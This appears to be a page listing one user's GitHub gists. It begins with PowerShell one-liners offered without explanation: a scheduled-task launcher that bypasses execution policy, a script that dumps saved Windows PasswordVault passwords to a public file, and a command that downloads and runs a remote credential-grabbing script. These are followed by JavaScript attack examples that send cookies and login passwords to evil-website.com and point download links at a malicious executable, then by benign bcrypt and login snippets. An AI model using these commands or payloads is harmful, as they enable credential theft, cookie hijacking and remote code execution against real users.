Kyle Mistele K-Mistele
🏴☠️
K-Mistele
/ executescheduledtask.ps1
Created
June 23, 2021 21:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -ExecutionPolicy bypass "$action=New-ScheduledTaskAction -Execute 'C:\path\to\script.ps1';$trigger=New-ScheduledTaskTrigger -Once -At 'MM/DD/YYYY HH:MM:SS PM'; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Launch' -User 'DOMAIN\username'" |
K-Mistele
/ credlistv2.ps1
Created
June 23, 2021 21:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] | |
| $vault = New-Object Windows.Security.Credentials.PasswordVault | |
| $vault.RetrieveAll() |% {$_.RetrievePasswords();$_} | Out-File C:\users\public\output.dmp |
K-Mistele
/ oneliner.ps1
Created
June 23, 2021 21:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HanseSecure/credgrap_ie_edge/master/credgrap_ie_edge.ps1')" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] | |
| $vault = New-Object Windows.Security.Credentials.PasswordVault | |
| $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password |
K-Mistele
/ download_page_example.js
Created
January 15, 2021 21:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // grab all download links on the page | |
| const download_links = document.getElementsByClassName('download-link'); | |
| // change their target to a malicious piece of software hosted on the attacker's server | |
| for (let link of download_links) { | |
| link.setAttribute('href', 'https://evil-website.com/evil-program.exe'); | |
| } |
K-Mistele
/ forum_example.js
Created
January 15, 2021 21:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // capture the cookies | |
| const cookie = document.cookie; | |
| // send the cookies to the attacker | |
| fetch('https://evil-website.com/cookie-capture', { | |
| data: cookie | |
| }); |
K-Mistele
/ login_page_example.js
Created
January 15, 2021 21:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // add an event listener to the form | |
| const form_element = document.getElementsByTagName('form')[0]; | |
| form_element.addEventListener('submit', () => { | |
| // capture the username and password from the form | |
| const username = document.getElementById('username_input').value; | |
| const password = document.getElementById('password_input').value; | |
| // send the username and password to the attacker | |
| fetch(`https://evil-website.com/password-capture/?u=${username}&p=${password}`); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const username = document.getElementById('username_input'); | |
| const username_box = document.getElementById('username_box'); | |
| user_name_box.innerHTML = username; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import bcrypt | |
| # this will create the hash that you need to store in your database | |
| def create_bcrypt_hash(password): | |
| # convert the string to bytes | |
| password_bytes = password.encode() | |
| # generate a salt | |
| salt = bcrypt.gensalt(14) | |
| # calculate a hash as bytes | |
| password_hash_bytes = bcrypt.hashpw(password_bytes, salt) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def login(username, password): | |
| user = Users.get(username) # fetch the user record from the database | |
| # if no user matches the username, don't log them in | |
| if not user: | |
| return False | |
| # hash the supplied password | |
| supplied_hash = some_hash_function(password) |